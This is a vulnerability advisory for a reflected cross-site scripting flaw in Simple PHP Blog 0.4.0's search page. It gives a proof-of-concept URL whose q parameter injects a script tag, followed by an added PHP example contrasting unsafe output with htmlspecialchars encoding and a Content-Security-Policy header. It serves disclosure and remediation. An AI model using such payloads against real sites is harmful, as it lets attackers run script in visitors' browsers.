Simple PHP Blog 0.4.0 Cross Site Scripting Vulnerability

2016-11-08T00:00:00
ID 1337DAY-ID-26259
Type zdt
Reporter Boumediene Kaddour
Modified 2016-11-08T00:00:00

Description

Exploit for php platform in category web applications

                                        
[+] Credits: Boumediene KADDOUR AKA sh311c0d3r

[+] Website: http://www.pentestingskills.com

Vendor:
======================
http://www.simpleblogphp.com


Product:
===============================
Simple PHP Blog 0.4.0


Vulnerability Type:
=============================
Cross Site Scripting (XSS)


CVE Reference:
==============
N/A


Vulnerability Details:
=====================
The search bar in the search.php script does not properly sanitize
user-supplied data, which makes the script prone to cross-site scripting
and in turn allows an attacker to execute JavaScript on the client side.


Exploit code(s):
================

http://192.168.43.167/internal/blog/search.php?q=%3Cscript%3Ealert%28%22SickApp%22%29%3C%2Fscript%3E
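
The flaw described above and its fix, as an added example that is not part of the original advisory and not Simple PHP Blog's own source. The function names and HTML markup are hypothetical; only the q parameter and its value are taken from the URL above.

```php
<?php
// Added example, not Simple PHP Blog's code: the function names and markup
// below are hypothetical and only model a search page that reflects ?q=.

// Vulnerable pattern: the raw query value is concatenated into HTML, so any
// markup inside q is parsed by the browser as part of the page.
function render_search_heading_unsafe(string $q): string
{
    return '<h2>Search results for: ' . $q . '</h2>';
}

// Hardened pattern: encode for the HTML context at the point of output.
// ENT_QUOTES also encodes both quote characters for attribute contexts;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_search_heading_safe(string $q): string
{
    return '<h2>Search results for: ' . html_escape($q) . '</h2>';
}

// Search pages commonly echo the query back into the input's value
// attribute as well, which needs the same encoding.
function render_search_form_safe(string $q): string
{
    return '<form action="search.php" method="get">'
         . '<input type="text" name="q" value="' . html_escape($q) . '">'
         . '</form>';
}

// Decoded value of the q parameter from the URL in this advisory.
$q = urldecode('%3Cscript%3Ealert%28%22SickApp%22%29%3C%2Fscript%3E');

// Defence in depth (assumes the site needs no inline scripts): a policy
// without 'unsafe-inline' blocks injected inline script if an output is missed.
if (PHP_SAPI !== 'cli' && !headers_sent()) {
    header('Content-Type: text/html; charset=UTF-8');
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
}

echo render_search_heading_unsafe($q), "\n"; // script element reaches the page intact
echo render_search_heading_safe($q), "\n";   // payload is rendered as inert text
echo render_search_form_safe($q), "\n";      // quotes encoded inside the attribute
```

Run from the command line, the first line of output contains a live script element and the other two contain only entity-encoded text.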


Disclosure:
=============================================
November 07/11/2016 : Public Disclosure


sh311c0d3r
